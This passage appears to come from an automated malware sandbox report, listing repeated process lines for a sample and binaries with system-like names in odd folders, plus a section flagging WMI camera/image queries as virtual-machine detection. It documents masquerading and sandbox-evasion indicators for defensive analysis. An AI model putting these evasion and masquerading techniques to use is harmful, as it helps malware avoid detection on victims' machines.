                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
